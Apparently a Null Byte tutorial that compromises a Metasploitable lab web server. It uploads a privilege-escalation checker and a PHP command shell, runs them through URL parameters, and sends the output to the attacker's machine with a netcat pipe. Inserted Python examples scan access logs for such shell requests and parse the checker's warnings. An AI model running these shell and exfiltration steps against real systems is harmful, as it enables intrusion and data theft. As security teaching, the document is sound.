
Web Server Compromise and Uploading Privilege Escalation Verification Files, Part 2 «Null Byte :: WonderHowTo



In the first guide, we laid the groundwork for our ultimate goal of uploading and running the unix-privesc-check script on our target. We identified an input field that is vulnerable to SQL injection and used sqlmap to set up a file stager on the server. Now we can upload files and run the script to identify any misconfigurations that could allow privilege escalation.

The unix-privesc-check script is a Bash script that runs on Unix systems and attempts to identify misconfigurations that could allow privilege escalation. It can be run either in standard mode (optimized for speed) or in detailed mode (more thorough). The standard mode still checks for many things, including file permissions, user permissions, SSH keys, and other security settings. The detailed mode is more thorough but slower and more prone to false positives.

Step 1: Upload the Script

First, we need to find out where the script lives on our own file system. We can search for it with the locate command:

  locate unix-privesc-check
  /usr/bin/unix-privesc-check
  /usr/share/unix-privesc-check
  /usr/share/applications/kali-unix-privesc-check.desktop
  /usr/share/doc/unix-privesc-check
  /usr/share/doc/unix-privesc-check/AUTHORS
  /usr/share/doc/unix-privesc-check/CHANGELOG.gz
  /usr/share/doc/unix-privesc-check/TODO
  /usr/share/doc/unix-privesc-check/changelog.Debian.gz
  /usr/share/doc/unix-privesc-check/changelog.gz
  /usr/share/doc/unix-privesc-check/copyright
  /usr/share/icons/hicolor/16x16/apps/kali-unix-privesc-check.png
  /usr/share/icons/hicolor/22x22/apps/kali-unix-privesc-check.png
  /usr/share/icons/hicolor/24x24/apps/kali-unix-privesc-check.png
  /usr/share/icons/hicolor/256x256/apps/kali-unix-privesc-check.png
  /usr/share/icons/hicolor/32x32/apps/kali-unix-privesc-check.png
  /usr/share/icons/hicolor/48x48/apps/kali-unix-privesc-check.png
  /usr/share/kali-menu/applications/kali-unix-privesc-check.desktop
  /usr/share/unix-privesc-check/unix-privesc-check
  /var/lib/dpkg/info/unix-privesc-check.list
  /var/lib/dpkg/info/unix-privesc-check.md5sums

We see a series of results, including documentation, related images and binary files, but the file we want is the Bash script itself in the directory /usr/share/unix-privesc-check/.

Now that we have the location of the script, we can return to our file stager and browse to it. After selecting it, click the "Upload" button and we should see that the file has been uploaded successfully. If you do not know which button I'm talking about, be sure to read the first part of this guide, because you need to know what's going on in that part.

Since the script now sits in the /var/www/ directory on the server, we should be able to reach it simply by appending its name to the URL, like so:

But wait. The only thing that happens is that the script's source appears in the browser window, which is not what we want. For the script to run, we need a way to issue commands in that directory on the server. Fortunately, we can do this with a simple PHP script.

Step 2: Upload the Shell

First, create a file named cmd.php with the following contents:

   

This one-liner takes an operating system command as a request parameter and runs it on the underlying server. We will use this to execute our script.

Upload the command shell using the same method as before by navigating to the file stager and clicking the "Upload" button:

We can ensure that this works properly by appending the following to the URL:

  /cmd.php?cmd= 

For example, issuing the command uname -a returns operating system information.

Now that we know our command shell is working, it's time to run the unix-privesc-check script. On Unix systems, the dot slash (./) prefix is used to run an executable in the current directory. It is a relative path, and it allows the execution of files in directories that are not listed in the $PATH environment variable.

  /cmd.php?cmd=./unix-privesc-check

We can then tell our command shell to run the script by appending the above to the URL.

This does not actually return any results; it just prints the usage information, which tells us we need to specify a mode. In most cases the standard mode works fine, so that is what we will use here. The command to enter should now read:

  /cmd.php?cmd=./unix-privesc-check standard

Now we can see that the results fill the browser window.

This script checks a variety of things, and although we can see the results in the browser, that is not very useful if we lose our connection or want to review the results later. It would be more helpful if we could send the results back to our own machine. One method we could use is the handy Netcat tool.

Step 3: Pipe Output to Local Machine

Netcat is a utility commonly used to troubleshoot network connectivity issues. It works over TCP/IP and can be found on many systems. Hackers often use Netcat as a backdoor or as a means to create shells. We can use this powerful tool to send the output of our script over the network and save it to a file on our local computer.

The first thing we need to do is open a listener on our own computer. We can do this with the nc command and the -lvp switches, which tell it to listen, verbosely, on a chosen port, here 1234. Then we use the redirect symbol (>) to write whatever arrives into a file named results.txt.

  nc -lvp 1234 > results.txt
  listening on [any] 1234 ...

Now we can run the script in the browser as before, but pipe (|) its output into Netcat. The command to type looks like this, using the appropriate IP address and port:

  /cmd.php?cmd=./unix-privesc-check standard | nc 172.16.1.100 1234

After a few moments, our listener should receive a connection:

  172.16.1.102: inverse host lookup failed: Unknown host
  connect to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 43282
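Seen from the defender's side, the requests above leave a clear trace in the web server's access log: a PHP page taking a cmd parameter, and a value that pipes into nc with an IP and port. The following added example (not from the original post) scans constructed Apache combined-format log lines for that pattern; the parameter names in SHELL_PARAMS and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (not a real capture).
SAMPLE_LOG = """\
172.16.1.100 - - [10/Apr/2018:13:58:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.1.100 - - [10/Apr/2018:13:58:05 +0000] "GET /cmd.php?cmd=uname%20-a HTTP/1.1" 200 97 "-" "Mozilla/5.0"
172.16.1.100 - - [10/Apr/2018:13:58:20 +0000] "GET /cmd.php?cmd=./unix-privesc-check%20standard%20%7C%20nc%20172.16.1.100%201234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.16.1.100 - - [10/Apr/2018:13:59:00 +0000] "GET /search.php?q=privesc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# Parameter names typical of one-line PHP command shells (assumed list).
SHELL_PARAMS = {"cmd", "exec", "command"}
# Command chaining or piping inside the parameter value.
CHAIN_RE = re.compile(r'[|;]|&&')
# "nc <ip> <port>" inside the value: the output is being sent to another host.
NC_RE = re.compile(r'\bnc\b\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')


def find_webshell_requests(log_text):
    """Return one finding per request that passes a command to a PHP shell parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(".php"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
        for name in sorted(SHELL_PARAMS.intersection(params)):
            for cmd in params[name]:
                nc = NC_RE.search(cmd)
                findings.append({
                    "ts": m.group("ts"), "src": m.group("src"), "path": parts.path,
                    "param": name, "cmd": cmd,
                    "chained": bool(CHAIN_RE.search(cmd)),
                    "exfil": (nc.group(1), int(nc.group(2))) if nc else None,
                })
    return findings


if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG):
        print(f["ts"], f["src"], f["path"], repr(f["cmd"]), "exfil:", f["exfil"])
```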

Give the script some time to complete. It will appear to hang in both the browser and the terminal, but it is filling the text file we specified. We can now cat the results:

  cat results.txt
  Assuming the OS is: linux
  Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

  This script checks file permissions and other settings that could allow
  local users to escalate privileges.

  Use of this script is only permitted on systems which you have been granted
  legal permission to perform a security assessment of.  Apart from this
  condition the GPL v2 applies.

  Search the output below for the word 'WARNING'.  If you don't see it then
  this script didn't find any problems.

  ############################################
  Recording hostname
  ############################################
  metasploitable

  ############################################
  Recording uname
  ############################################
  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

  ############################################
  Recording Interface IP addresses
  ############################################
  eth0      Link encap:Ethernet  HWaddr 08:00:27:77:62:6c
            inet addr:172.16.1.102  Bcast:172.31.255.255  Mask:255.240.0.0
            inet6 addr: fe80::a00:27ff:fe77:626c/64 Scope:Link
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:3462 errors:0 dropped:0 overruns:0 frame:0
            TX packets:2757 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:446794 (436.3 KB)  TX bytes:974776 (951.9 KB)
            Base address:0xd010 Memory:f0000000-f0020000

  lo        Link encap:Local Loopback
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:16436  Metric:1
            RX packets:487 errors:0 dropped:0 overruns:0 frame:0
            TX packets:487 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:214953 (209.9 KB)  TX bytes:214953 (209.9 KB)

  ############################################
  Checking if external authentication is allowed in /etc/passwd
  ############################################
  No +:... line found in /etc/passwd

  ############################################
  Checking nsswitch.conf for addition authentication methods
  ############################################
  Neither LDAP nor NIS are used for authentication

  ...

There is a lot of information here, and the results will vary depending on how well the target is secured. Basically, you should look for the word "WARNING" to find problems. For example, it looks like the script has found a public SSH key in the root user's home directory on the server:

  ############################################
  Searching public SSH key directories
  ############################################
  WARNING: Public SSH key was found in /root/.ssh/authorized_keys

With the results saved on our own computer, we can refer back to them at any time for possible ways of escalating privileges in further attacks on the target.
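Rather than eyeballing a long report for the word "WARNING", it helps to attribute each warning to the check that raised it. The following added example (not part of the original post, nor of unix-privesc-check itself) splits output in the banner layout shown above into sections and collects the WARNING lines per section; the sample report is constructed, and its section titles and findings are assumptions.

```python
import re

# A section header is a title line between two lines of '#' characters.
BANNER = re.compile(r'^#{20,}\s*$')

# Constructed excerpt in the layout unix-privesc-check prints (not a real run).
SAMPLE_OUTPUT = """\
Assuming the OS is: linux
Starting unix-privesc-check v1.4 ( http://pentestmonkey.net/tools/unix-privesc-check )

############################################
Recording hostname
############################################
metasploitable

############################################
Checking nsswitch.conf for addition authentication methods
############################################
Neither LDAP nor NIS are used for authentication

############################################
Checking for public SSH keys in home directories
############################################
WARNING: Public SSH key found in /root/.ssh/authorized_keys

############################################
Checking for writable config files
############################################
WARNING: /etc/example.conf is writable by group staff
WARNING: /etc/example.conf is writable by user www-data
"""


def parse_sections(text):
    """Return a list of (title, body_lines) pairs, one per banner-delimited section."""
    sections, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        if BANNER.match(lines[i]) and i + 2 < len(lines) and BANNER.match(lines[i + 2]):
            title, body, i = lines[i + 1].strip(), [], i + 3
            while i < len(lines) and not BANNER.match(lines[i]):
                body.append(lines[i])
                i += 1
            sections.append((title, body))
        else:
            i += 1  # preamble text before the first banner is skipped
    return sections


def collect_warnings(text):
    """Return {section title: [WARNING lines]} for the sections that found something."""
    out = {}
    for title, body in parse_sections(text):
        hits = [l.strip() for l in body if l.lstrip().startswith("WARNING")]
        if hits:
            out[title] = hits
    return out
```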

Wrapping Up

In this tutorial, picking up where we left off in Part 1, we located and uploaded a script using sqlmap to look for ways to escalate privileges on the target. However, we had to do a few extra things to make it work, such as uploading a command shell to actually execute the script. We also learned how to use Netcat to transfer the output to a file on our local computer for later use. This attack scenario is just one of the many ways hackers compromise systems in the wild, and it shows that you can never be too creative with this craft.

Title image by TBIT/Pixabay; screenshots by drd_/Null Byte
